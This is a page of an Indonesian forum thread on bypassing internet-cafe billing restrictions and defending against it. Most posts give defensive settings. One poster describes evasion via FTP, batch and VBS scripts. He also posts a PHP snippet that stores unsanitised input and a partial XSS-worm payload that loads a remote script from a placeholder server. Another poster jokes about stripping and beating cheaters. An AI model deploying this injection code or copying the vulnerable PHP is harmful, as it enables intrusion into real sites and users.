Page 2 of 3 FirstFirst 123 LastLast
Results 16 to 30 of 31
http://idgs.in/173257

Quote Originally Posted by -sony- View Post
    yg jadi pertanyaannya, bagaimana cara anda meng-install program di komputer tersebut?
    program apaan yg diinstal?? kaga ada program yg diinstall.. zhider tu lgsg execute..

salah satu solusi lain:
    gw nyaranin warnet jg terapin blocking eksekusi file berdasarkan path drive
    yg berpotensi dtgnya virus atau utk blocking file eksekusi yang tidak dikehendaki (.exe .com .scr .pif) atau file2 script (.vbs .bat ,dll) untuk tidak dijalankan pada path drive tertentu (cdrom/dvdrom,flash disk,hard drive tertentu selain system)

bisa buka control panel->administratif tools->local security police->software restriction polices (klik kanan pada tab ini) kemudian->create new polices (nantinya ada 2 direktori baru terbentuk (lihat gbr)->klik kanan di additional rules dan pilih new path rule... nanti akan tampil jendela baru dan tulis path drive yg ingin anda matikan fungsi executable file & scriptnya..misal E:\ F:\ atau mungkin D;\ isi tab security level dengan "disallowed" utk memblok path drive tersebut.

(jgn sekali-kali mengisi path system windowsny.) dengan begini maka file-file eksekusi/script .exe .com .src .vbs .bat tidak dapat dieksekusi baik virus maupun file setup (untuk bisa mengeksekusinya bisa dipindahkan terlebih dahulu ke path lain yang tida di blok).. cara ini cukup ampuh untuk menjaga system dari virus2 berformat tersebut (autorun.inf pun jika merujuk ke file eksekusi virus pun tidak akan berjalan) terkecuali worm2 html, atau JS.

nah dgn blok semua path kecuali path C:\ setidaknya client ga bisa jalanin tu zhider ato aplikasi2 lain..

setidaknya salah satu solusi ini bisa diterapin..client juga tidak jadi merasa dibatasi dalam olah data..copy mencopy dari hdd ke f.disk pun masih bisa client lakukan..
    Last edited by bl00d13z; 14-03-09 at 09:08.

2. Hot Ad
    Black Zero's Avatar

Gw sih prefer semua disable buat game center. Klo buat warnet baru boleh ke flash disk. Klo game center bisa usb wahhhhhhhhhhhhhhhhhh pada copy bolak balik cheat program semua.

endhiet's Avatar

loh yg punya warnet kok malah nanya cara nembusin biling??

ini yg punya warnet apa pemain d warnet??

kalo emang situ op/yg punya kan ketauan dari komputer op itu pc online apa kagak

kalo ketauan offline tapi ada yg maen kan gampang solusinya

samperin ke pcnya tarik ke depan warnet telanjangin trus suruh pulang

kalo lom puas gamparin dulu ampe puas biar emaknya tau

LuCkyM3's Avatar

Quote Originally Posted by endhiet View Post
    loh yg punya warnet kok malah nanya cara nembusin biling??

ini yg punya warnet apa pemain d warnet??

kalo emang situ op/yg punya kan ketauan dari komputer op itu pc online apa kagak

kalo ketauan offline tapi ada yg maen kan gampang solusinya

samperin ke pcnya tarik ke depan warnet telanjangin trus suruh pulang

kalo lom puas gamparin dulu ampe puas biar emaknya tau
    cara pintar... namun gw liat op2 di daerah gw, untuk geser bokong 5 centi aja malas, boro2 samperin

Quote Originally Posted by bl00d13z View Post
    program apaan yg diinstal?? kaga ada program yg diinstall.. zhider tu lgsg execute..

salah satu solusi lain:
    gw nyaranin warnet jg terapin blocking eksekusi file berdasarkan path drive
    yg berpotensi dtgnya virus atau utk blocking file eksekusi yang tidak dikehendaki (.exe .com .scr .pif) atau file2 script (.vbs .bat ,dll) untuk tidak dijalankan pada path drive tertentu (cdrom/dvdrom,flash disk,hard drive tertentu selain system)

bisa buka control panel->administratif tools->local security police->software restriction polices (klik kanan pada tab ini) kemudian->create new polices (nantinya ada 2 direktori baru terbentuk (lihat gbr)->klik kanan di additional rules dan pilih new path rule... nanti akan tampil jendela baru dan tulis path drive yg ingin anda matikan fungsi executable file & scriptnya..misal E:\ F:\ atau mungkin D;\ isi tab security level dengan "disallowed" utk memblok path drive tersebut.

(jgn sekali-kali mengisi path system windowsny.) dengan begini maka file-file eksekusi/script .exe .com .src .vbs .bat tidak dapat dieksekusi baik virus maupun file setup (untuk bisa mengeksekusinya bisa dipindahkan terlebih dahulu ke path lain yang tida di blok).. cara ini cukup ampuh untuk menjaga system dari virus2 berformat tersebut (autorun.inf pun jika merujuk ke file eksekusi virus pun tidak akan berjalan) terkecuali worm2 html, atau JS.

nah dgn blok semua path kecuali path C:\ setidaknya client ga bisa jalanin tu zhider ato aplikasi2 lain..

setidaknya salah satu solusi ini bisa diterapin..client juga tidak jadi merasa dibatasi dalam olah data..copy mencopy dari hdd ke f.disk pun masih bisa client lakukan..

maksud gw warnet yang gw main itu ga bisa di install apa pun kecuali lewat bypass admin

kamu bilang program itu langsung di exekusi ? pertanyaanya sama kayak gw tadi

bagaimana cara anda mengeksekusi klo explorernya di matiin ???, USB di disable dan msh banyak lagi deh, pokoknya file dari luar ga bisa masuk !!!!

itu aja yang paling penting, klo itu semua di blok, bakalan ga ada bisa masuk FLASH DISK, MAU PUN PROGRAM DARI LUAR

jamin deh

Quote Originally Posted by -sony- View Post
    maksud gw warnet yang gw main itu ga bisa di install apa pun kecuali lewat bypass admin

kamu bilang program itu langsung di exekusi ? pertanyaanya sama kayak gw tadi

bagaimana cara anda mengeksekusi klo explorernya di matiin ???, USB di disable dan msh banyak lagi deh, pokoknya file dari luar ga bisa masuk !!!!

itu aja yang paling penting, klo itu semua di blok, bakalan ga ada bisa masuk FLASH DISK, MAU PUN PROGRAM DARI LUAR

jamin deh
    ini warnet kan.. ada browser kan pastinya... klo gw upload dulu tu file trus gw download tu file di warnet gmn?.. ga ada browser n ga bisa download juga?! sloww.. gw upload ke FTP server trus gw download via FTP client di windows.. buka cmd bs download via FTP.. cmd di blok?! sloow... kn bisa bkin batch ato vbsnya.. notepad ma wordpad ada kan..

Black Zero's Avatar

Port 80 diblok aja dari router.... dah beres.

Quote Originally Posted by Black Zero View Post
    Port 80 diblok aja dari router.... dah beres.
    FTP port 21 hehe.. mau di blok jg port 21?! sbnernya bs lwt RPC..gunain bnyk port tu salah satuny 111.. sisanya wat rquotad,mountd,statd,portmap,ma lockd portny diatas 1000 ..masih bnyk service2 lain yg bisa digunain wat transfer data..SMB cth, .. sbnernya bloking port 80 kesian.. ribed tar klo da client game yg launchernya gunain tu port..hehe (warnet yg tak nyaman tar julukannya)

permasalahannya kan sy cm jawab gmn cara bypass cyberbilling..sy kasih tau cr populer n saya jg kasih solusi utk itu..buat warnet yg emg udah jalanin solusi2 itu ya ga usah ribetin lagi urus proteksinya..

singkat kata: "keamanan berbanding terbalik dgn kenyamanan" idealkan hal tersebut untuk tujuan anda..
    Last edited by bl00d13z; 15-03-09 at 09:33. Reason: quote

Quote Originally Posted by bl00d13z View Post
    ini warnet kan.. ada browser kan pastinya... klo gw upload dulu tu file trus gw download tu file di warnet gmn?.. ga ada browser n ga bisa download juga?! sloww.. gw upload ke FTP server trus gw download via FTP client di windows.. buka cmd bs download via FTP.. cmd di blok?! sloow... kn bisa bkin batch ato vbsnya.. notepad ma wordpad ada kan..
    CMD, notepad, Download itu semua bekerja di Explorer kan ???

klo explorer d blok gimana???

singkat saja penjelasan mengenai warnet itu
    begitu kasih masuk billing, ada icon-icon game, juga ada mozzilla
    kamu cuma bisa memilih di antara itu,,,lain dari itu tidak bisa

CMD ama notepad mana ada di cyber billing.. explorernya terkunci sayang

Download ???
    begitu anda ingin mendownload file dari firefox, windownya langsung tertutup otomatis (kayak di close gitu)

pokoknya ga bisa di apa-apain, download map dota saja tidak bisa...

Siaunen2's Avatar

@sony
    cara ribet kek ini cuman bisa d terapin d gamenet...
    kalo d terapin d warnet?
    pelanggan kabur krn gk nyaman.......
    solusi plg baik ya kembali ke fungsi op warnet tsb

makanya..gw bilang gini singkat kata: "keamanan berbanding terbalik dgn kenyamanan" idealkan hal tersebut untuk tujuan anda.. ini thread kan buat masukan yg punya warnet.. kalopun sony maksa gmn cara eksekusi file tersebut saya bisa aja kasi tau gmn cara reverse engineering file tersebut kemudian inject script tersebut ke situs pribadi kita..istilahnya XSS worm.. dimana bisa kita gabungkan sebuah file eksekusi dengan bantuan JS dan php..hanya masalahnya disini bukan konten nya..

perhatiin snippet gw :
    Code:
    <?php
    $p=$HTTP_GET_VARS['param'];
    $filename = "./file.txt";

if ($p != "") {
    $handle=fopen($filename, "wb");
    fputs($handle, $p);
    fclose($handle);
    }

$handle = fopen($filename, "r");
    $contents = fread($handle, filesize($filename));
    fclose($handle);

print $contents;
    ?>
    ini file indexnya.. distu ada ./file.txt bisa saya costumize..ini standar..skrg tinggal gimana sebuah file exe diintruksi dengan JS
    sory saya cuma kasih function request nya spotong (namanya jg snippet) private. bisa explore ndiri gmn maksud dari saya ini
    Code:
    .........function do_request() {
    var ip = get_random_ip();
    var exploit_string = '<iframe name="iframe2" id="iframe2" ' +
    'src="hidden" style="display:none"></iframe> ' +
    '<script SRC="http://<webserver>/xssv.js"></script>';

loadIframe('iframe2',
    "http://" + ip + "/index.php?param=" + exploit_string);
    }..............
    Last edited by bl00d13z; 15-03-09 at 15:57.

chikkiz's Avatar

pake CafeSuite

www.cafesuite.net

setuju ma atas.... tinggal di disconnect aja tuh yang curang....
    ato klo ga, kompie yg ga di pake di kunci dari billing,...

Default IDGS

Quote Originally Posted by chikkiz View Post
    pake CafeSuite

www.cafesuite.net
    Setuju biar ga pusink....

Fitur Cafesuite hampir lengkap.

Bagi awal pemakaian emang pusink tapi da lama pasti gerti (sip banget)

gegehare's Avatar

wew, diangkat lagi...

pernah ada thread sejenis :
    http://www.indogamers.com/f293/cyber...bol_kah-98894/

buat nambah2 info sklik aja...
    yg belum dikasih disini....

Who is Trafalgar Law? The Captain and Doctor of the Heart Pirates? a Man with bounty 200.000.000 Beli? Surgeon of Death? No , He is just a Rookie Pirate who know the meaning about "Will of D."

"I told you, I'm waiting for the right time...Dont get rushed, "One Piece" isn't going anywhere...Now, enough talking, Shut up and follow my orders...I'll be sure, To steal the proper throne" - Trafalgar Law

GeGeHaRe One Piece Predictions
    New Nakama - Country Of Brigands - Wano Country - X Mark - Fire Sword

Page 2 of 3 FirstFirst 123 LastLast